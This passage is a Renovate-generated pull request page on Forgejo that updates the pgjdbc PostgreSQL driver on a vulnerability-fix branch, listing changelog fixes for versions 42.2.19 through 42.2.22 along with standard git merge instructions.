[PR#2199](https://github.com/PR/pgjdbc/issues/2199) Fixes Issue [#&#8203;2196](https://github.com/pgjdbc/pgjdbc/issues/2196) - Rework sql type gathering to use OID instead of typname. This does not have the issue of name shadowing / qual-names, and has the added benefit of fixing [#&#8203;1948](https://github.com/pgjdbc/pgjdbc/issues/1948). ### [`v42.2.22`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#42222-2021-06-16) ##### Fixed - Regression caused by [`4fa2d5b`](https://github.com/pgjdbc/pgjdbc/commit/4fa2d5bc1ed8c0086a3a197fc1c28f7173d53cac). Unfortunately due to the blocking nature of the driver and issues with seeing if there is a byte available on a blocking stream when it is encrypted this introduces unacceptable delays in returning from peek(). At this time there is no simple solution to this. ### [`v42.2.21`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#42221-2021-06-10) ##### Changed - Update docs to reflect deprecated DataSource API setServerName backpatch [PR#2057](https://github.com/pgjdbc/pgjdbc/pull/2057) [PR #&#8203;2105](https://github.com/pgjdbc/pgjdbc/pull/2105) ##### Fixed - make sure the table has defined primary keys when using updateable resultset backpatch [PR#2101](https://github.com/pgjdbc/pgjdbc/pull/2101) fixes [Issue 1975](https://github.com/pgjdbc/pgjdbc/issues/1975) [PR #&#8203;2106](https://github.com/pgjdbc/pgjdbc/pull/2106) - backpatch [PR #&#8203;2143](https://github.com/pgjdbc/pgjdbc/pull/2143) read notifies or errors that come in asynchronously after the ready for query [PR #&#8203;2168](https://github.com/pgjdbc/pgjdbc/pull/2168) - backpatch [PR #&#8203;507](https://github.com/pgjdbc/pgjdbc/pull/507) which reworks OSGI bundle activator fixes [ISSUE #&#8203;2133](https://github.com/pgjdbc/pgjdbc/issues/2133) - Fix database metadata getFunctions() and getProcedures() to ignore search\_path when no schema pattern is specified. backpatch [PR #&#8203;2174](https://github.com/pgjdbc/pgjdbc/pull/2174) fixes [Issue 2173](https://github.com/pgjdbc/pgjdbc/issues/2173) ### [`v42.2.20`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#42220-2021-04-19) ##### Fixed - Partitioned indexes were not found fixes [#&#8203;2078](https://github.com/pgjdbc/pgjdbc/issues/2078) PR [#&#8203;2087](https://github.com/pgjdbc/pgjdbc/pull/2087) - isValid() timeout should not be blocked [#&#8203;1943](https://github.com/pgjdbc/pgjdbc/pull/1943) Cherry-picked [#&#8203;2076](https://github.com/pgjdbc/pgjdbc/pull/2076) The usage of `setQueryTimeout();` with the same value as the `setNetworkTimeout();` is blocking the current transaction timeout. The timeouts are blocking each other with this approach. - DatabaseMetaData.getTables returns columns in UPPER case as per the spec [PR #&#8203;2092](https://github.com/pgjdbc/pgjdbc/pull/2092) fixes [Issue #&#8203;830](https://github.com/pgjdbc/pgjdbc/issues/830) ### [`v42.2.19`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#42219-2021-02-18) **Notable Changes** - Now the driver uses SASLprep normalization for SCRAM authentication fixing some issues with spaces in passwords. - If closeOnCompletion is called on an existing statement and the statement is executed a second time it will fail. ##### Changed - Perf: avoid duplicate PGStream#changeSocket calls - Fix: Actually close unclosed results. Previously was not closing the first unclosed result fixes [#&#8203;1903](https://github.com/pgjdbc/pgjdbc/issues/1903) ([#&#8203;1905](https://github.com/pgjdbc/pgjdbc/issues/1905)). There is a small behaviour change here as a result. If closeOnCompletion is called on an existing statement and the statement is executed a second time it will fail. ##### Added - Verify code via forbidden-apis (jdk-internal and jdk-non-portable signatures) [PR #&#8203;2012](https://github.com/pgjdbc/pgjdbc/pull/2012) ##### Fixed - Fix Binary transfer for numeric fixes [#&#8203;1935](https://github.com/pgjdbc/pgjdbc/issues/1935) - Fix Allow specifying binaryTransferEnable even for those types that are not enabled by default - Fix: properly set cancel socket timeout ([#&#8203;2044](https://github.com/pgjdbc/pgjdbc/issues/2044)) - Fix "Required class information missing" when old org.jboss:jandex parses pgjdbc classes \[issue 2008]\[[#&#8203;2008](https://github.com/pgjdbc/pgjdbc/issues/2008)] - Fix PGCopyInputStream returning the last row twice when reading with CopyOut API \[issue 2016]\[[#&#8203;2016](https://github.com/pgjdbc/pgjdbc/issues/2016)] - Fix Connection.isValid() to not wait longer than existing network timeout [PR #&#8203;2040](https://github.com/pgjdbc/pgjdbc/pull/2040) - Fix Passwords with spaces (ASCII and non-ASCII) now work with SCRAM authentication (driver now uses SASLprep normalization) [PR #&#8203;2052](https://github.com/pgjdbc/pgjdbc/pull/2052) - Fix DatabaseMetaData.getTablePrivileges() to include views, materialized views, and foreign tables [PR #&#8203;2049](https://github.com/pgjdbc/pgjdbc/pull/2049) - Fix Resolve ParseError in PGtokenizer fixes [#&#8203;2050](https://github.com/pgjdbc/pgjdbc/issues/2050) - Fix return metadata privileges for views and foreign tables </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://github.com/renovatebot/renovate). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
kayos force-pushed renovate/maven-org.postgresql-postgresql-vulnerability from eb1b04b572 to f5486692ce 2026-06-28 22:02:00 -07:00 Compare
Author
Member

Edited/Blocked Notification

Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR.

You can manually request rebase by checking the rebase/retry box above.

⚠️ Warning: custom changes will be lost.

### Edited/Blocked Notification Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR. You can manually request rebase by checking the rebase/retry box above. ⚠️ **Warning**: custom changes will be lost.
Some checks failed
Checking for spelling errors / rojopolis/spellcheck (push) Has been cancelled
This pull request can be merged automatically.
This branch is out-of-date with the base branch
You are not authorized to merge this pull request.
View command line instructions

Checkout

From your project repository, check out a new branch and test the changes.
git fetch -u origin renovate/maven-org.postgresql-postgresql-vulnerability:renovate/maven-org.postgresql-postgresql-vulnerability
git checkout renovate/maven-org.postgresql-postgresql-vulnerability

Merge

Merge the changes and update on Forgejo.

Warning: The "Autodetect manual merge" setting is not enabled for this repository, you will have to mark this pull request as manually merged afterwards.

git checkout main
git merge --no-ff renovate/maven-org.postgresql-postgresql-vulnerability
git checkout renovate/maven-org.postgresql-postgresql-vulnerability
git rebase main
git checkout main
git merge --ff-only renovate/maven-org.postgresql-postgresql-vulnerability
git checkout renovate/maven-org.postgresql-postgresql-vulnerability
git rebase main
git checkout main
git merge --no-ff renovate/maven-org.postgresql-postgresql-vulnerability
git checkout main
git merge --squash renovate/maven-org.postgresql-postgresql-vulnerability
git checkout main
git merge --ff-only renovate/maven-org.postgresql-postgresql-vulnerability
git checkout main
git merge renovate/maven-org.postgresql-postgresql-vulnerability
git push origin main
Sign in to join this conversation.
No reviewers
No labels
No milestone
No project
No assignees
2 participants
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference: Sulkta-OSS/dynmap-neoforge#10
No description provided.